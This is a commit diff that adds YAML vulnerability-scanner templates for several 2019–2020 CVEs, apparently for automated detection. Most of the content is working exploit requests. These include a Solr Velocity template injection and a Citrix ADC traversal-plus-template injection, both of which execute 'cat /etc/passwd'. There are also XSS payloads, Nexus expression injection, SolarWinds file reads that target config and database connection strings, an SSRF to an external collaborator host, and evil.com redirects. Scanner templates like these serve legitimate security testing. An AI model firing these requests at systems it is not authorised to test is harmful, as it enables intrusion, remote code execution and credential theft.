Add files via upload

CVE-2019-17558.yaml

@@ -0,0 +1,33 @@
+id: cve-2019-17558
+info:
+  name: Solr RCE
+
+requests:
+  - method: POST
+    redirect: true
+    url: >-
+     {{.BaseURL}}/solr/test/config
+    headers:
+      - Content-Type: application/json
+    body: >-
+      {
+        "update-queryresponsewriter": {
+          "startup": "lazy",
+          "name": "velocity",
+          "class": "solr.VelocityResponseWriter",
+          "template.base.dir": "",
+          "solr.resource.loader.enabled": "true",
+          "params.resource.loader.enabled": "true"
+        }
+      }
+  - method: GET
+    url: >-
+     {{.BaseURL}}/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(cat%20%2Fetc%2Fpasswd))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
+    headers:
+      - Content-Type: application/json
+    detections:
+      - >-
+        StatusCode() == 200 && RegexSearch("response", "root:[x*]:0:0:")
+
+reference:
+  - https://www.cvebase.com/cve/2019/17558

CVE-2019-18394.yaml

@@ -0,0 +1,22 @@
+id: cve-2019-18394
+info:
+  name: OpenFire SSRF
+  risk: Critical
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      getFavicon
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?host=burpcollaborator.net
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StringSearch("resBody", "<h1>Burp Collaborator Server</h1>") 
+references:
+  - https://www.cvebase.com/cve/2019/18394

CVE-2019-19368.yaml

@@ -0,0 +1,20 @@
+id: cve-2019-19368
+info:
+  name: Rumpus FTP XSS
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}//Login?!'><sVg/OnLoAD=alert`1337`//
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "value=''><sVg/OnLoAD=alert`1337`//'>") 
+references:
+  - https://www.cvebase.com/cve/2019/19368

CVE-2019-19719.yaml

@@ -0,0 +1,22 @@
+id: cve-2019-19719
+info:
+  name: Tableau Server DOM XSS
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      en/embeddedAuthRedirect.html
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?auth=javascript:document.write(14700+14770)
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StringSearch("resBody", "29470") 
+references:
+  - https://www.cvebase.com/cve/2019/19719

CVE-2019-19781.yaml

@@ -0,0 +1,49 @@
+id: cve-2019-19781
+info:
+  name: Citrix ADC Path Traversal
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      vpn/
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}../vpns/cfg/smb.conf
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StringSearch("resBody", "[global]") 
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/{{.endpoint}}../vpns/portal/scripts/newbm.pl
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - NSC_USER: ../../../netscaler/portal/templates/somuniquestr
+      - NSC_NONCE: nsroot
+      - Content-Type: application/x-www-form-urlencoded
+    body: |
+        url=http://example.com&title=somuniquestr&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
+    detections:
+      - >-
+        1 == 0
+  # checking if exploit works
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/{{.endpoint}}../vpns/portal/somuniquestr.xml
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - NSC_USER: nsroot
+      - NSC_NONCE: nsroot
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")
+
+references:
+  - https://www.cvebase.com/cve/2019/19781

CVE-2019-19908.yaml

@@ -0,0 +1,22 @@
+id: cve-2019-19908
+info:
+  name: phpMyChat-Plus XSS
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      plus/pass_reset.php
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "<script>alert(1337)</script>") 
+references:
+  - https://www.cvebase.com/cve/2019/19908

CVE-2019-19985.yaml

@@ -0,0 +1,22 @@
+id: cve-2019-19985
+info:
+  name: WordPress Plugin Email Subscribers & Newsletters Unauthenticated File Download
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      wp-admin/admin.php
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?page=download_report&report=users&status=all
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "Content-Disposition: attachment; filename=all-contacts.csv;") 
+references:
+  - https://www.cvebase.com/cve/2019/19985

CVE-2019-20141.yaml

@@ -0,0 +1,23 @@
+id: cve-2019-20141
+info:
+  name: Wordpress Laborator Neon Theme Reflected XSS
+  risk: Medium
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      data/autosuggest-remote.php
+      admin/data/autosuggest-remote.php
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?q=<img%20src=x%20onerror=alert(1)>
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StringSearch("resHeaders", "<img src=x onerror=alert(1)>") && StatusCode() != 301 && StatusCode() != 302
+references:
+  - https://www.cvebase.com/cve/2019/20141

CVE-2020-0618.yaml

@@ -0,0 +1,22 @@
+id: cve-2020-0618
+info:
+  name: SQL Server Reporting Services RCE
+  risk: Potential
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  prefixes: 'REPORTSERVER, ReportServer'
+
+requests:
+  - method: GET
+    url: >-
+      {{.root}}//Pages/ReportViewer.aspx
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("body", "view report") && StringSearch("body", "ReportViewerControl")
+reference:
+  - https://www.cvebase.com/cve/2020/0618

CVE-2020-10148.yaml

@@ -0,0 +1,32 @@
+id: cve-2020-10148
+info:
+  name: SolarWindsOrion LFI CVE-2020-10148
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/web.config.i18n.ashx?l=j&v=j
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch('response', 'SolarWinds.Orion.Core.Common.') && StringSearch("resHeaders", 'text/plain')
+        
+  - method: GET
+    redirect: false
+    url: >-
+      {{.root}}/SWNetPerfMon.db.i18n.ashx?l=j&v=j
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch('response', 'Connection String') && StringSearch("resHeaders", 'SolarWindsOrionDatabaseUser')
+references:
+  - author: '0xsha'
+  - links:
+    - https://kb.cert.org/vuls/id/843464

CVE-2020-10199.yaml

@@ -0,0 +1,25 @@
+id: cve-2020-10199
+info:
+  name: Nexus Repository Manager RCE
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      rest/beta/repositories/go/group
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+      - Content-Type: application/json
+    body: '{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ 1337 * 1337 }"]}}'
+    detections:
+      - >-
+        StatusCode() == 400 && StringSearch("resBody", "1787569")
+
+references:
+  - https://www.cvebase.com/cve/2020/10199

CVE-2020-10204.yaml

@@ -0,0 +1,24 @@
+id: cve-2020-10204
+info:
+  name: Nexus Repository Manager RCE
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      extdirect
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    body: '{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{1337*1337"]}],"type":"rpc","tid":28}'
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "1787569")
+
+references:
+  - https://www.cvebase.com/cve/2020/10204

CVE-2020-10220.yaml

@@ -0,0 +1,23 @@
+id: cve-2020-10220
+info:
+  name: rConfig SQLi
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      login.php
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resBody", "rConfig Version 3.9")
+
+references:
+  - https://www.cvebase.com/cve/2020/10220

CVE-2020-11034.yaml

@@ -0,0 +1,24 @@
+id: cve-2020-11034
+info:
+  name: GLPI Open Redirect
+  risk: High
+
+params:
+  - root: '{{.BaseURL}}'
+
+variables:
+  - endpoint: |
+      index.php
+requests: 
+  - method: GET
+    url: >-
+      {{.root}}/{{.endpoint}}?redirect=/\/evil.com/
+      {{.root}}/{{.endpoint}}?redirect=//evil.com
+    headers:
+      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+    detections:
+      - >-
+        RegexSearch("resHeaders", "(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$")
+
+references:
+  - https://www.cvebase.com/cve/2020/11034